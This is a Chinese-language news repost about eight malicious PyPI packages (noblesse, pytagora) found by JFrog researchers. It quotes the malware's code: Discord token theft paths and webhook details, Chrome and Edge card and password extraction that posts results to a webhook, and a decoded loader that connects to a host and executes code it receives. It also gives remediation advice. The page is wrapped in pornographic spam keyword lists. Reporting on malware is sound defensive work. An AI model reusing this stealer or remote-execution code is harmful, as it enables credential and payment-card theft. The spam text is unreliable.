日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > python >内容正文

python

下个软件包可能泄露信用卡信息,Python 包存储库 PyPI 又爆恶意代码,下载达 3 万次,你中招了吗?...

發布時間:2024/9/15 python 46 豆豆
生活随笔 收集整理的這篇文章主要介紹了 下个软件包可能泄露信用卡信息,Python 包存储库 PyPI 又爆恶意代码,下载达 3 万次,你中招了吗?... 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

轉自:機器之心

近日,有研究人員又在 Python 官方軟件包存儲庫 PyPI 中發現了 8 個惡意軟件包,這些惡意代碼會暗中竊取信用卡數據和登錄憑據,并在受感染的機器上注入惡意代碼。據估計,這些軟件包的下載次數達到了 3 萬次。

PyPI(Python Package Index)是 Python 的正式第三方軟件包的開源軟件存儲庫,它類似于 CPAN(Perl 的存儲庫)。pip 等一些軟件包管理器就是默認從 PyPI 下載軟件包。任何用戶都可以下載第三方庫和上傳自己開發的庫,目前通過 PyPI 可以下載超過 23.5 萬個 Python 軟件包。

但是,PyPI 軟件存儲庫經常被濫用也成為一個不爭的事實。2018 年,一位安全研究者 Bertus 對 PyPI 進行安全掃描時發現了 12 個有問題的軟件包,其中包含可以導致安全隱患、開啟后門甚至盜取比特幣的惡意代碼;2020 年騰訊洋蔥反入侵系統發現 PyPI 被惡意上傳了 request 釣魚包,攻擊者通過偽造 requests 包名進行釣魚,能夠對受感染的主機進行入侵,進而可能竊取用戶敏感信息及數字貨幣密鑰、種植持久化后門、命令控制等。

近日,DevOps 軟件供應商 JFrog 的幾位研究人員發表文章稱,他們最近在 PyPI 中又發現了 8 個可執行一系列惡意活動的軟件包,并且根據對 PePy 網站(一個提供 Python 包下載統計數據的站點)的搜索,這些惡意包的下載次數估計達到了 3 萬。

他們表示,這些惡意代碼會暗中竊取信用卡數據和登錄憑據,并在受感染的機器上注入惡意代碼。在收到研究人員的通知后,PyPI 的維護者 Dustin Ingram 迅速做出反應并刪除了惡意軟件包

兩類不同的惡意代碼族構成系統性威脅

這一發現是近年來一系列攻擊中最新的一個,這些攻擊超過了開源存儲庫的接受能力,數以百萬計的軟件開發人員每天都依賴開源存儲庫。盡管軟件存儲庫扮演著至關重要的角色,但它們往往缺乏魯棒的安全性和審查控制,當開發人員在不知情的情況下感染惡意代碼或將惡意代碼嵌入他們發布的軟件時,這一弱點有可能導致嚴重的供應鏈攻擊。

JFrog 首席技術官 Asaf Karas 表示:「諸如 PyPI 這樣的流行軟件庫中不斷發現惡意軟件包,這種趨勢令人擔憂,有可能導致更為廣泛的供應鏈攻擊。攻擊者使用簡單的混淆技術來引入惡意軟件,這意味著開發人員必須時刻保持關注和警惕。這是一種系統性威脅,需要在包括軟件存儲庫的維護人員和開發人員等不同層面上進行解決。」

與大多數 Python 惡意軟件一樣,這些包僅使用了簡單的混淆技術,例如來自 Base64 編碼器的混淆。在這 8 個惡意軟件包中,前 6 個(noblesse、genesisbot、aryi、suffer、noblesse2 和 noblessev2)均包含 3 個有效負載,一個用于獲取 Discord 賬戶的認證 cookie,第二個用于提取在瀏覽器存儲的任何密碼或支付款卡數據,第三個用于收集受感染 PC 的信息,如 IP 地址、計算機名和用戶名。

有效負載 1:竊取 Discord 身份驗證 token

noblesse 惡意軟件族的首個有效負載是竊取 Discord 身份驗證 token。身份驗證 token 允許攻擊者冒充最初持有 token 的用戶,類似于 HTTP 會話 cookie。竊取 token 的有效負載基于臭名昭著的 dTGPG 有效負載,它是一個從未公開發布的生成器工具,但個性化 token 抓取器是公開共享的,并且一些示例也上傳到了 GitHub。因此,Discord 身份驗證 token 竊取器代碼非常簡單,它迭代一組硬編碼的路徑:

local = os.getenv('LOCALAPPDATA') roaming = os.getenv('APPDATA')paths = {'Discord': roaming + '\\Discord','Discord Canary': roaming + '\\discordcanary','Discord PTB': roaming + '\\discordptb','Google Chrome': local + '\\Google\\Chrome\\User Data\\Default','Opera': roaming + '\\Opera Software\\Opera Stable','Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default','Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'}

然后讀取這些路徑下(特別是 Local Sotrage\leveldb)的所有的. log 和. ldb 文件,并查找 Discord 身份驗證 token。所得結果通過 Webhook 上傳到 Discord,所用參數如下:

{"type": 1,"id": "807327703082074143","name": "Captain Hook","avatar": null,"channel_id": "725001140324008047","guild_id": "720931953251057725","application_id": null,"token": "uwAgm7PQaROJB3USUNDv1RT7uJzfidUsHBsC_y0p2qtChlzNVgpG1vw2zAtkFX-8Xq-x"}

有效負載 2:竊取自動完成敏感數據(信用卡和密碼)

noblesse 惡意軟件族的第二個有效負載可自動完成信息竊取。目前所有的現代瀏覽器都支持保存用戶密碼和信用卡信息的能力:

這種自動保存功能給用戶帶來了極大的便利,但缺點是,這些信息可能會被訪問本地機器的惡意軟件泄露。在這種情況下,惡意軟件試圖從 Chrome 竊取信用卡信息:

def cs():master_key = master()login_db = os.environ['USERPROFILE'] + os.sep + \r'AppData\Local\Google\Chrome\User Data\default\Web Data'shutil.copy2(login_db,"CCvault.db")conn = sqlite3.connect("CCvault.db")cursor = conn.cursor()try:cursor.execute("SELECT * FROM credit_cards")for r in cursor.fetchall():username = r[1]encrypted_password = r[4]decrypted_password = dpw(encrypted_password, master_key)expire_mon = r[2]expire_year = r[3]hook.send(f"CARD-NAME:" + username + "\nNUMBER:" + decrypted_password + "\nEXPIRY M:" + str(expire_mon) + "\nEXPIRY Y:" + str(expire_year) + "\n" + "*" * 10 + "\n")

另外,從 Edge 中竊取保存的密碼和信用卡信息:

login_db = os.environ['USERPROFILE'] + os.sep + r'\AppData\Local\Microsoft\Edge\User Data\Profile 1\Login Data'... cursor.execute("SELECT action_url, username_value, password_value FROM logins") decrypted_password = dpw(encrypted_password, master_key)if username != ""or decrypted_password !="":hook.send(f"URL:" + url + "\nUSER:" + username + "\nPASSWORD:" + decrypted_password + "\n" + "*" * 10 + "\n")

有效負載 3:用戶系統信息收集

noblesse 惡意軟件族的第三個有效負載是收集中招用戶系統的相關信息,并上傳至上文提到的 Webhook。收集的信息包括如下:

  • IP 地址;

  • 計算機名;

  • 用戶名;

  • Windows 許可關鍵信息;

  • Windows 版本;

  • 屏幕截圖(使用 Pillow 的 ImageGrab)。

pytagora 惡意軟件族:遠程代碼注入攻擊

不過,Karas 表示前 6 個軟件包具有感染開發者計算機的能力,但卻不能用惡意軟件感染開發者編寫的代碼。第二類惡意軟件族則要簡單得多,軟件包的代碼如下:

import mathimport base64,sys def hello():exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3Qs...')) def hypotenuse(a,b):hello()c = math.sqrt(math.pow(a,2) + math.pow(b,2))return round(c,2) def other(c,x):y = math.sqrt(math.pow(c,2)-math.pow(x,2))return round(y,2)

模糊代碼又被解碼為了以下代碼片段:

import socket,struct,times=socket.socket(2,socket.socket.socket.SOCK_STREAM) s.connect(('172.16.60.80',9009))l=struct.unpack('>I',s.recv(4))[0] print (l)d=s.recv(l) print (d)while len(d)>!1:d+=s.recv(l-len(d)) print (d) exec(d,{'s':s})

簡單地說,惡意軟件試圖連接 TCP 端口 9009 上的私有 IP 地址,然后執行從 socket 中讀取的任何 Python 代碼。

對此,Karas 表示:「對于 pytagora 和 pytagora2 這兩個軟件包,則允許在安裝它們的機器上代碼執行,這是有可能的。在感染了開發機器之后,惡意軟件包允許代碼執行,然后攻擊者可以下載有效負載,從而修改正在開發的軟件項目。我們沒有證據表明惡意軟件確實是這樣執行的。」

機器中招,怎么辦?

如果你在檢查完 PyPI 依賴項后,確認 noblesse(或是克隆版本)已經在本地安裝,你可以采取以下建議:

  • 檢查 Edge 中保存了哪些密碼,并在每個網站上更改這些被泄露的密碼(還包括重復使用相同密碼的網站)。你可以這樣做:打開 Edge,然后導航到 edge://settings/passwords。保存密碼的完整列表(這些都是潛在的危害)可以在 Saved passwords 查看。

  • 檢查哪些信用卡信息保存在 Chrome,可以考慮在 Chrome 中取消這些信用卡。你可以這樣做:打開 Chrome,導航到 chrome://settings/payments。完整的信用卡信息列表(這些都是潛在的危害)可以在 Payment methods 中查看。

  • 如果你已經確定 pytagora(或者克隆版本)已經在你的機器上本地安裝,盡管你的機器可能不會感染相關的惡意軟件,但建議你還是遵循常用的惡意軟件檢查步驟進行檢查,例如使用已安裝的殺毒軟件進行全面掃描。

    參考鏈接:

    https://www.secrss.com/articles/24477

    https://www.freebuf.com/column/188051.html

    https://jfrog.com/blog/malicious-pypi-packages-stealing-credit-cards-injecting-code/

    https://arstechnica.com/gadgets/2021/07/malicious-pypi-packages-caught-stealing-developer-data-and-injecting-code/?comments=1&post=40097199

    推薦閱讀

    Pandas處理數據太慢,來試試Polars吧!

    懶人必備!只需一行代碼,就能導入所有的Python庫

    絕!關于pip的15個使用小技巧

    介紹10個常用的Python內置函數,99.99%的人都在用!

    可能是全網最完整的 Python 操作 Excel庫總結!

    總結

    以上是生活随笔為你收集整理的下个软件包可能泄露信用卡信息,Python 包存储库 PyPI 又爆恶意代码,下载达 3 万次,你中招了吗?...的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 亚洲国产18| 欧美黄色录像视频 | 成人精品一区二区三区中文字幕 | 欧美天天色 | 日韩一级免费观看 | 老司机午夜在线 | 无码精品黑人一区二区三区 | 国产欧美123| 国产精品66 | 三年中文在线观看免费观看 | 欧美人妖xxxx | 亚洲av无码一区二区三区性色 | 亚洲天堂av一区 | 亚洲av无码一区二区三区人 | 午夜精品美女久久久久av福利 | 久草精品在线观看 | 91成人一区 | 九九热视频这里只有精品 | 天天干狠狠爱 | 卡一卡二av| 色偷偷av| 91久久人澡人人添人人爽欧美 | 青娱乐国产在线视频 | 可以看av的网站 | 妓院一钑片免看黄大片 | 邵氏电影《金莲外传2》免费观看 | 99国产精品久久久久久久成人 | 女性向小h片资源在线观看 日本天天操 | 天堂网av在线播放 | 午夜精品久久久久久99热 | 久久爱影视| 免费av网站大全 | 久久久精品久久 | 欧美被狂躁喷白浆精品 | 国产精品丝袜视频 | 99精品在线免费观看 | 日韩av二区 | www.av在线免费观看 | 99人妻碰碰碰久久久久禁片 | 91爱啪啪| 日本黄色xxxxx | 性生活视屏 | 国产精品视频久久久久 | 特黄一级大片 | 五月天丁香久久 | 五月天婷婷丁香 | 亚洲精品乱码久久久久久按摩观 | av免费片 | 九九三级 | 一本大道东京热无码 | 91中文字日产乱幕4区 | 国产成人精品一区在线播放 | 性猛交富婆╳xxx乱大交天津 | 99国产精品久久久久99打野战 | 在线看免费毛片 | 男女吻胸做爰摸下身 | 三上悠亚ed2k | 樱花视频在线免费观看 | 中文字幕乱码亚洲精品一区 | 欧美日韩视频免费 | 天天干天天天 | 香蕉久久久久 | 久草手机在线观看 | 成年人黄色一级片 | 夜夜操影视| 在线播放无码后入内射少妇 | 欧美三级免费看 | 亚洲人在线观看 | 成人免费视频国产在线观看 | 国产污污在线观看 | 91在线亚洲 | 国产婷婷一区二区三区 | 国产99久久久久久免费看 | 亚洲性图av | 四虎图库| 高h视频在线观看 | 精品久久亚洲 | 冲田杏梨 在线 | 日韩av在线免费观看 | 天天色天天色天天色 | 日韩欧美一区二区三区免费观看 | 91丨porny丨| 亚洲永久在线 | a在线播放 | 国产成人无码a区在线观看视频 | 六月激情网 | 日韩三级一区二区 | 欧美日韩午夜精品 | 国产91在线精品 | 亚洲精品色| 欧洲精品一区 | 在线观看免费黄色小视频 | japanese21ⅹxx日本 | 日韩av无码一区二区三区不卡 | 久草在现 | 一级小毛片 | 欧洲视频一区二区三区 | xxxx18国产| 肉丝肉足丝袜一区二区三区 |